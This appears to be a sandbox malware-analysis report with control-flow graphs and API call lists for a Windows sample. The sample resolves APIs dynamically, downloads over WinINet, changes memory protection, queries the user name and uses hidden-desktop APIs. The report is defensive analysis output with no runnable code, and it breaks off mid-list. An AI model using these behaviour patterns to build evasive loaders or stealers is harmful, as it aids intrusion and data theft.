                                control_flow_graph 1895 ff6c40-ff6c64 call ff2930 1898 ff6c66-ff6c6b 1895->1898 1899 ff6c75-ff6c97 call ff4bc0 1895->1899 1898->1899 1900 ff6c6d-ff6c6f lstrcpy 1898->1900 1903 ff6caa-ff6cba call ff2930 1899->1903 1904 ff6c99 1899->1904 1900->1899 1908 ff6cbc-ff6cc2 lstrcpy 1903->1908 1909 ff6cc8-ff6cf5 InternetOpenA StrCmpCA 1903->1909 1906 ff6ca0-ff6ca8 1904->1906 1906->1903 1906->1906 1908->1909 1910 ff6cfa-ff6cfc 1909->1910 1911 ff6cf7 1909->1911 1912 ff6ea8-ff6ebb call ff2930 1910->1912 1913 ff6d02-ff6d22 InternetConnectA 1910->1913 1911->1910 1922 ff6ebd-ff6ebf 1912->1922 1923 ff6ec9-ff6ee0 call ff2a20 * 2 1912->1923 1914 ff6d28-ff6d5d HttpOpenRequestA 1913->1914 1915 ff6ea1-ff6ea2 InternetCloseHandle 1913->1915 1917 ff6e94-ff6e9e InternetCloseHandle 1914->1917 1918 ff6d63-ff6d65 1914->1918 1915->1912 1917->1915 1920 ff6d7d-ff6dad HttpSendRequestA HttpQueryInfoA 1918->1920 1921 ff6d67-ff6d77 InternetSetOptionA 1918->1921 1924 ff6daf-ff6dd3 call 10171e0 call ff2a20 * 2 1920->1924 1925 ff6dd4-ff6de4 call 1013d90 1920->1925 1921->1920 1922->1923 1926 ff6ec1-ff6ec3 lstrcpy 1922->1926 1925->1924 1935 ff6de6-ff6de8 1925->1935 1926->1923 1937 ff6dee-ff6e07 InternetReadFile 1935->1937 1938 ff6e8d-ff6e8e InternetCloseHandle 1935->1938 1937->1938 1941 ff6e0d 1937->1941 1938->1917 1943 ff6e10-ff6e15 1941->1943 1943->1938 1944 ff6e17-ff6e3d call 1017310 1943->1944 1947 ff6e3f call ff2a20 1944->1947 1948 ff6e44-ff6e51 call ff2930 1944->1948 1947->1948 1952 ff6e53-ff6e57 1948->1952 1953 ff6e61-ff6e8b call ff2a20 InternetReadFile 1948->1953 1952->1953 1954 ff6e59-ff6e5b lstrcpy 1952->1954 1953->1938 1953->1943 1954->1953
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6C6F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF6CC2
                                • InternetOpenA.WININET(0101CFEC,00000001,00000000,00000000,00000000), ref: 00FF6CD5
                                • StrCmpCA.SHLWAPI(?,00D6F3C8), ref: 00FF6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00D6EEC8,00000000,00000000,-00400100,00000000), ref: 00FF6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FF6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FF6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FF6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00FF6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6E8E
                                • InternetCloseHandle.WININET(?), ref: 00FF6E98
                                • InternetCloseHandle.WININET(00000000), ref: 00FF6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: e7b3452769d4df0865488ff3b3ab132dc8b0f17dbe81711ccd63ba7b5c584b3e
                                • Instruction ID: f3e46d242e50ef62a5e21c691b15d69ccbdc311e91abe15d042d5c0cf00617f0
                                • Opcode Fuzzy Hash: e7b3452769d4df0865488ff3b3ab132dc8b0f17dbe81711ccd63ba7b5c584b3e
                                • Instruction Fuzzy Hash: A8819E72E00219ABEB30DFA4DC49FAE77B8AF44710F104168FA45EB294DB74AD449B94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2511 ff4a60-ff4afc RtlAllocateHeap 2528 ff4afe-ff4b03 2511->2528 2529 ff4b7a-ff4bbe VirtualProtect 2511->2529 2530 ff4b06-ff4b78 2528->2530 2530->2529
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00FF4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: f39ab811fa60390dc1cac8ec6a0f8469ce02318833a098ce102de47401af814a
                                • Instruction ID: 87acecfb84a158071bb1c70fc53ee24d603ebe90b2905afd89e73c168c6c1115
                                • Opcode Fuzzy Hash: f39ab811fa60390dc1cac8ec6a0f8469ce02318833a098ce102de47401af814a
                                • Instruction Fuzzy Hash: 7231C929F8023D769620EBFF4C4BF5F6E55EFC5AA0B02405BF588DF201D9A25501CAE2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 01012A8A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: a8601397ca410d3773d7ed52471bce929b12727d04be9234cae781b2db0343ab
                                • Instruction ID: 04a357a9006a7156641a954bc67625efd355d8efc4413a4f883aa9b780cf4418
                                • Opcode Fuzzy Hash: a8601397ca410d3773d7ed52471bce929b12727d04be9234cae781b2db0343ab
                                • Instruction Fuzzy Hash: 78F0BB71A40258BFC720DF88DD49F9EB7BCF704B21F000116F915D3680D778190487A1

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(77190000,00D56318), ref: 010166F5
                                • GetProcAddress.KERNEL32(77190000,00D563F8), ref: 0101670D
                                • GetProcAddress.KERNEL32(77190000,00D68F60), ref: 01016726
                                • GetProcAddress.KERNEL32(77190000,00D68F18), ref: 0101673E
                                • GetProcAddress.KERNEL32(77190000,00D68F90), ref: 01016756
                                • GetProcAddress.KERNEL32(77190000,00D6D710), ref: 0101676F
                                • GetProcAddress.KERNEL32(77190000,00D5A190), ref: 01016787
                                • GetProcAddress.KERNEL32(77190000,00D6D530), ref: 0101679F
                                • GetProcAddress.KERNEL32(77190000,00D6D428), ref: 010167B8
                                • GetProcAddress.KERNEL32(77190000,00D6D440), ref: 010167D0
                                • GetProcAddress.KERNEL32(77190000,00D6D6C8), ref: 010167E8
                                • GetProcAddress.KERNEL32(77190000,00D56338), ref: 01016801
                                • GetProcAddress.KERNEL32(77190000,00D56238), ref: 01016819
                                • GetProcAddress.KERNEL32(77190000,00D56378), ref: 01016831
                                • GetProcAddress.KERNEL32(77190000,00D56038), ref: 0101684A
                                • GetProcAddress.KERNEL32(77190000,00D6D650), ref: 01016862
                                • GetProcAddress.KERNEL32(77190000,00D6D518), ref: 0101687A
                                • GetProcAddress.KERNEL32(77190000,00D5A078), ref: 01016893
                                • GetProcAddress.KERNEL32(77190000,00D561D8), ref: 010168AB
                                • GetProcAddress.KERNEL32(77190000,00D6D6E0), ref: 010168C3
                                • GetProcAddress.KERNEL32(77190000,00D6D4B8), ref: 010168DC
                                • GetProcAddress.KERNEL32(77190000,00D6D698), ref: 010168F4
                                • GetProcAddress.KERNEL32(77190000,00D6D578), ref: 0101690C
                                • GetProcAddress.KERNEL32(77190000,00D561F8), ref: 01016925
                                • GetProcAddress.KERNEL32(77190000,00D6D458), ref: 0101693D
                                • GetProcAddress.KERNEL32(77190000,00D6D638), ref: 01016955
                                • GetProcAddress.KERNEL32(77190000,00D6D620), ref: 0101696E
                                • GetProcAddress.KERNEL32(77190000,00D6D4D0), ref: 01016986
                                • GetProcAddress.KERNEL32(77190000,00D6D6F8), ref: 0101699E
                                • GetProcAddress.KERNEL32(77190000,00D6D668), ref: 010169B7
                                • GetProcAddress.KERNEL32(77190000,00D6D4E8), ref: 010169CF
                                • GetProcAddress.KERNEL32(77190000,00D6D560), ref: 010169E7
                                • GetProcAddress.KERNEL32(77190000,00D6D470), ref: 01016A00
                                • GetProcAddress.KERNEL32(77190000,00D5F730), ref: 01016A18
                                • GetProcAddress.KERNEL32(77190000,00D6D680), ref: 01016A30
                                • GetProcAddress.KERNEL32(77190000,00D6D500), ref: 01016A49
                                • GetProcAddress.KERNEL32(77190000,00D56058), ref: 01016A61
                                • GetProcAddress.KERNEL32(77190000,00D6D6B0), ref: 01016A79
                                • GetProcAddress.KERNEL32(77190000,00D56078), ref: 01016A92
                                • GetProcAddress.KERNEL32(77190000,00D6D548), ref: 01016AAA
                                • GetProcAddress.KERNEL32(77190000,00D6D488), ref: 01016AC2
                                • GetProcAddress.KERNEL32(77190000,00D56098), ref: 01016ADB
                                • GetProcAddress.KERNEL32(77190000,00D560F8), ref: 01016AF3
                                • LoadLibraryA.KERNEL32(00D6D4A0,0101051F), ref: 01016B05
                                • LoadLibraryA.KERNEL32(00D6D5D8), ref: 01016B16
                                • LoadLibraryA.KERNEL32(00D6D5F0), ref: 01016B28
                                • LoadLibraryA.KERNEL32(00D6D5A8), ref: 01016B3A
                                • LoadLibraryA.KERNEL32(00D6D608), ref: 01016B4B
                                • LoadLibraryA.KERNEL32(00D6D590), ref: 01016B5D
                                • LoadLibraryA.KERNEL32(00D6D5C0), ref: 01016B6F
                                • LoadLibraryA.KERNEL32(00D6D818), ref: 01016B80
                                • GetProcAddress.KERNEL32(77040000,00D56158), ref: 01016B9C
                                • GetProcAddress.KERNEL32(77040000,00D6D8C0), ref: 01016BB4
                                • GetProcAddress.KERNEL32(77040000,00D68AE0), ref: 01016BCD
                                • GetProcAddress.KERNEL32(77040000,00D6D890), ref: 01016BE5
                                • GetProcAddress.KERNEL32(77040000,00D56198), ref: 01016BFD
                                • GetProcAddress.KERNEL32(73DB0000,00D5A000), ref: 01016C1D
                                • GetProcAddress.KERNEL32(73DB0000,00D56678), ref: 01016C35
                                • GetProcAddress.KERNEL32(73DB0000,00D5A2D0), ref: 01016C4E
                                • GetProcAddress.KERNEL32(73DB0000,00D6D740), ref: 01016C66
                                • GetProcAddress.KERNEL32(73DB0000,00D6D800), ref: 01016C7E
                                • GetProcAddress.KERNEL32(73DB0000,00D56758), ref: 01016C97
                                • GetProcAddress.KERNEL32(73DB0000,00D567B8), ref: 01016CAF
                                • GetProcAddress.KERNEL32(73DB0000,00D6D758), ref: 01016CC7
                                • GetProcAddress.KERNEL32(768D0000,00D564F8), ref: 01016CE3
                                • GetProcAddress.KERNEL32(768D0000,00D56698), ref: 01016CFB
                                • GetProcAddress.KERNEL32(768D0000,00D6D848), ref: 01016D14
                                • GetProcAddress.KERNEL32(768D0000,00D6D7D0), ref: 01016D2C
                                • GetProcAddress.KERNEL32(768D0000,00D56798), ref: 01016D44
                                • GetProcAddress.KERNEL32(75790000,00D5A1E0), ref: 01016D64
                                • GetProcAddress.KERNEL32(75790000,00D5A348), ref: 01016D7C
                                • GetProcAddress.KERNEL32(75790000,00D6D830), ref: 01016D95
                                • GetProcAddress.KERNEL32(75790000,00D56658), ref: 01016DAD
                                • GetProcAddress.KERNEL32(75790000,00D565F8), ref: 01016DC5
                                • GetProcAddress.KERNEL32(75790000,00D5A398), ref: 01016DDE
                                • GetProcAddress.KERNEL32(75A10000,00D6D8A8), ref: 01016DFE
                                • GetProcAddress.KERNEL32(75A10000,00D56718), ref: 01016E16
                                • GetProcAddress.KERNEL32(75A10000,00D68B40), ref: 01016E2F
                                • GetProcAddress.KERNEL32(75A10000,00D6D7A0), ref: 01016E47
                                • GetProcAddress.KERNEL32(75A10000,00D6D770), ref: 01016E5F
                                • GetProcAddress.KERNEL32(75A10000,00D56778), ref: 01016E78
                                • GetProcAddress.KERNEL32(75A10000,00D56558), ref: 01016E90
                                • GetProcAddress.KERNEL32(75A10000,00D6D788), ref: 01016EA8
                                • GetProcAddress.KERNEL32(75A10000,00D6D860), ref: 01016EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 01016ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 01016EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 01016F05
                                • GetProcAddress.KERNEL32(76850000,00D564D8), ref: 01016F21
                                • GetProcAddress.KERNEL32(76850000,00D6D8D8), ref: 01016F39
                                • GetProcAddress.KERNEL32(76850000,00D6D878), ref: 01016F52
                                • GetProcAddress.KERNEL32(76850000,00D6D7B8), ref: 01016F6A
                                • GetProcAddress.KERNEL32(76850000,00D6D728), ref: 01016F82
                                • GetProcAddress.KERNEL32(75690000,00D56418), ref: 01016F9E
                                • GetProcAddress.KERNEL32(75690000,00D56438), ref: 01016FB6
                                • GetProcAddress.KERNEL32(769C0000,00D566B8), ref: 01016FD2
                                • GetProcAddress.KERNEL32(769C0000,00D6D7E8), ref: 01016FEA
                                • GetProcAddress.KERNEL32(6F8C0000,00D565D8), ref: 0101700A
                                • GetProcAddress.KERNEL32(6F8C0000,00D56478), ref: 01017022
                                • GetProcAddress.KERNEL32(6F8C0000,00D56618), ref: 0101703B
                                • GetProcAddress.KERNEL32(6F8C0000,00D6D1A0), ref: 01017053
                                • GetProcAddress.KERNEL32(6F8C0000,00D56458), ref: 0101706B
                                • GetProcAddress.KERNEL32(6F8C0000,00D56498), ref: 01017084
                                • GetProcAddress.KERNEL32(6F8C0000,00D564B8), ref: 0101709C
                                • GetProcAddress.KERNEL32(6F8C0000,00D566D8), ref: 010170B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 010170CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 010170E2
                                • GetProcAddress.KERNEL32(75D90000,00D6D260), ref: 010170FE
                                • GetProcAddress.KERNEL32(75D90000,00D68AB0), ref: 01017116
                                • GetProcAddress.KERNEL32(75D90000,00D6D290), ref: 0101712F
                                • GetProcAddress.KERNEL32(75D90000,00D6D2A8), ref: 01017147
                                • GetProcAddress.KERNEL32(76470000,00D56518), ref: 01017163
                                • GetProcAddress.KERNEL32(6D760000,00D6D128), ref: 0101717F
                                • GetProcAddress.KERNEL32(6D760000,00D56578), ref: 01017197
                                • GetProcAddress.KERNEL32(6D760000,00D6D2D8), ref: 010171B0
                                • GetProcAddress.KERNEL32(6D760000,00D6D188), ref: 010171C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 59d1e1653723303d13cc65e0eedf2755ecc8c30ab45132ee49e37af973c237ca
                                • Instruction ID: 0767b995d8f2b61ad4ba9d3cdeeb00c96af6574ad468854168c4e13b17f1584b
                                • Opcode Fuzzy Hash: 59d1e1653723303d13cc65e0eedf2755ecc8c30ab45132ee49e37af973c237ca
                                • Instruction Fuzzy Hash: 96626FB5610224BFDB74DF64F88CE2E37F9F788205B50A919EA559325CDB389980DF20
                                APIs
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F1D5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F1F1
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F1FC
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F215
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F220
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F239
                                • lstrcpy.KERNEL32(00000000,01024FA0), ref: 0100F25E
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F28C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F2C0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F2F0
                                • lstrlen.KERNEL32(00D560D8), ref: 0100F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: f24846ba38e7ff21c6766a6feeec6add1e85734c3cc17c8eb6ca87ddfead52a6
                                • Instruction ID: 4b72aa85a80f524374ddd3f7d2f2c90fd8d9b40a765c900a97d6fa90a962d69e
                                • Opcode Fuzzy Hash: f24846ba38e7ff21c6766a6feeec6add1e85734c3cc17c8eb6ca87ddfead52a6
                                • Instruction Fuzzy Hash: 45A2B4309012069FEBB2DF69D849A6EBBF4BF44304F1880ADE989DB395DB35D841DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010013
                                • lstrlen.KERNEL32(0101CFEC), ref: 010100BD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010100E1
                                • lstrlen.KERNEL32(0101CFEC), ref: 010100EC
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010110
                                • lstrlen.KERNEL32(0101CFEC), ref: 0101011B
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101013F
                                • lstrlen.KERNEL32(0101CFEC), ref: 0101015A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010189
                                • lstrlen.KERNEL32(0101CFEC), ref: 01010194
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010101C3
                                • lstrlen.KERNEL32(0101CFEC), ref: 010101CE
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010206
                                • lstrlen.KERNEL32(0101CFEC), ref: 01010250
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010288
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101059B
                                • lstrlen.KERNEL32(00D563D8), ref: 010105AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 010105D7
                                • lstrcat.KERNEL32(00000000,?), ref: 010105E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101060E
                                • lstrlen.KERNEL32(00D6ED18), ref: 01010625
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101064C
                                • lstrcat.KERNEL32(00000000,?), ref: 01010658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01010681
                                • lstrlen.KERNEL32(00D562F8), ref: 01010698
                                • lstrcpy.KERNEL32(00000000,?), ref: 010106C9
                                • lstrcat.KERNEL32(00000000,?), ref: 010106D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01010706
                                • lstrcpy.KERNEL32(00000000,00D68BD0), ref: 0101074B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101077F
                                • lstrcpy.KERNEL32(00000000,00D6ED90), ref: 010107E7
                                • lstrcpy.KERNEL32(00000000,00D68920), ref: 01010858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 010108CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01010928
                                • lstrcpy.KERNEL32(00000000,00D68980), ref: 010109F8
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF2528
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF254E
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF2577
                                • lstrcpy.KERNEL32(00000000,00D68810), ref: 01010ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 01010B81
                                • lstrcpy.KERNEL32(00000000,00D68810), ref: 01010D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
